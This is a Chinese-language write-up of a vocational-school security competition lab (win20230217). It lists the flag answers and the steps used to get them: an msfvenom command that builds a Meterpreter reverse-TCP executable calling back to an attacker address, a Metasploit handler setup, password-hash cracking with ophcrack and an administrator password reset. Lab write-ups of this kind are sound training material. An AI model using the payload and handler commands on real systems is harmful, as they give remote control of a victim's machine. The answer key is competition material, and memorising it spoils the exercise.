中职组安全-win20230217-环境-解析

*任务说明:

仅能获取win20230217的IP地址

用户名:test,密码:123456

  1. 访问服务器主机,找到主机中管理员名称,将管理员名称作为Flag值提交;

john

  1. 访问服务器主机,找到主机中补丁信息,将补丁编号作为Flag值提交;

KB4500331

查看方法如下:打开"开始"菜单。

单击"控制面板"

打开"添加删除程序"。

在弹出来的窗口左上角有"查看已安装的更新"选项。

3·访问服务器主机,找到主机中管理员密码,将管理员密码作为Flag值提交;

Goodluck

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶机运行

1、启动Metasploit,use exploit/multi/handler

2、设置payload,set payload windows/meterpreter/reverse_tcp

3、设置监听,set lhost ip

4、设置监听端口,set lport 4444

将John的hash弄到ophcrack密码出来了

4·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档名称作为Flag值提交;

ruK97azZp4

5·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档中信息作为Flag值提交;

rdO35NBXXi

6·访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为Flag值提交。

VX1DUEv95s

修改administrator的密码,登录进去回收站查看

相关推荐
LH_R21 小时前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
你的人类朋友1 天前
什么是API签名?
前端·后端·安全
深盾安全2 天前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO2 天前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
白帽黑客沐瑶2 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全2 天前
符号执行技术实践-求解程序密码
安全
贾维思基2 天前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张2 天前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫2 天前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_2 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全